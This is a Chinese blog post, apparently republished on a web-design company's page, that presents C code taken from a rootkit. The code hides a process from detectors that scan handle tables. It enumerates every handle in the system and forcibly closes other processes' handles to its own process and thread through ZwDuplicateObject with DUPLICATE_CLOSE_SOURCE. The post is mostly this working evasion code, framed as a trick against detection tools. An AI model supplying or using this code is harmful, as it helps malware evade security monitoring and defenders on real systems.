建站
咨询
售后
建站咨询
抹掉所有进程中自己的句柄
抹掉所有进程中自己的句柄
创新互联服务项目包括兴安网站建设、兴安网站制作、兴安网页制作以及兴安网络营销策划等。多年来,我们专注于互联网行业,利用自身积累的技术优势、行业经验、深度合作伙伴关系等,向广大中小型企业、政府机构等提供互联网行业的解决方案,兴安网站推广取得了明显的社会效益与经济效益。目前,我们服务的客户以成都为中心已经辐射到兴安省份的部分城市,未来相信会继续扩大服务区域并继续获得客户的支持与信任!
之前听过一个检测进程的想法,就是暴力枚举所有进程中的handle,查找其中类型为PROCESS的.
此法也被炉子牛用于他的LzOpenProcess().
下面我就写了一断代码来对抗这个方法,纯属小伎俩,牛牛们飘过~
严格说,此段代码不算原创,是从某rootkit的bin中扒出来的,因此基本保留其原貌,经我修改测试,主要函数如下:
void CloseAllmyHandles()
{
HANDLE hCurProcess,hSouceProcessHandle,hTargetHandle;
HANDLE hMyProcess=INVALID_HANDLE_VALUE,hMyThread=INVALID_HANDLE_VALUE;
DWORD pid,nBufferLen=0x40000,nRetnLen=0;
DWORD HandleCnt,NumberOfHandles;
DWORD pMyProcessObject = 0,pMyThreadObject = 0,pObject;
CLIENT_ID myCid,tmpCid;
PVOID pBuffer = NULL;
NTSTATUS status;
OBJECT_ATTRIBUTES ObjectAttributes;
myCid.UniqueProcess =(HANDLE)my_GetProcessId();
myCid.UniqueThread=(HANDLE)my_GetThreadId();
InitializeObjectAttributes( &ObjectAttributes, NULL, 0, NULL, NULL );
ZwOpenProcess(&hMyProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid);
ZwOpenThread(&hMyThread, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid);
printf("hMyProcess:0x%08x\n",hMyProcess);
printf("hMyThread :0x%08x\n",hMyThread);
hCurProcess = GetCurrentProcess();
status=ZwAllocateVirtualMemory(hCurProcess, &pBuffer, 0, &nBufferLen, MEM_COMMIT,PAGE_READWRITE);
if (!NT_SUCCESS(status))
{
printf("Alloc Memory failed.\n");
return;
}
printf("Alloced Buffer:0x%08X\n",pBuffer);
ZwQuerySystemInformation(SystemHandleInformation, pBuffer, nBufferLen, &nRetnLen);// 16=SystemHandleInformation
printf("Searching handles...\n");
HandleCnt=*(DWORD *)pBuffer;
printf("Handle Count:%d\n",HandleCnt);
if (HandleCnt>1)
{
NumberOfHandles=*(DWORD*)pBuffer;
pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD));
do
{
//printf("HandleValue:0x%08X\n",pHandleInfo->HandleValue);
if ( pHandleInfo->HandleValue==(USHORT)hMyThread )
{
if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess )
{
pMyThreadObject = *(DWORD*)&(pHandleInfo->Object);
printf("Thread finded\n");
}
}
if (pHandleInfo->HandleValue==(USHORT)hMyProcess )
{
if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess)
{
pMyProcessObject =*(DWORD*)&(pHandleInfo->Object);
printf("Process finded\n");
}
}
++pHandleInfo;
--NumberOfHandles;
}
while ( NumberOfHandles );
}
ZwClose(hMyThread);
ZwClose(hMyProcess);
printf("Found my object ok.\nBegin Search and Close...\n");
NumberOfHandles=HandleCnt;
if (HandleCnt>=1 )
{
pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD));
do
{
pObject = *(DWORD*)&(pHandleInfo->Object);
if ( pMyProcessObject == pObject || pMyThreadObject == pObject )
{
printf("Found Handle=0x%08X OwnerPID=%4d\n",pHandleInfo->HandleValue,pHandleInfo->UniqueProcessId);
tmpCid.UniqueProcess= (HANDLE)pHandleInfo->UniqueProcessId;
tmpCid.UniqueThread=0;
InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL );
status=ZwOpenProcess(&hSouceProcessHandle, PROCESS_DUP_HANDLE, &ObjectAttributes, &tmpCid);
//PrintZwError("ZwOpenProcess",status);
if (!status)
{
status=ZwDuplicateObject(
hSouceProcessHandle,
(void*)pHandleInfo->HandleValue,
hCurProcess,
&hTargetHandle,
0,
0,
DUPLICATE_CLOSE_SOURCE);
if ( !status)
{
ZwClose(hTargetHandle);
printf("Handle closed!\n");
}
//PrintZwError("ZwDuplicateObject",status);
ZwClose(hSouceProcessHandle);
}
}
++pHandleInfo;
--NumberOfHandles;
}
while ( NumberOfHandles );
}
ZwFreeVirtualMemory(hCurProcess, &pBuffer, &nBufferLen, MEM_RELEASE);
}
|
新闻名称:抹掉所有进程中自己的句柄
文章地址:http://www.jxjierui.cn/article/dhpgdhi.html
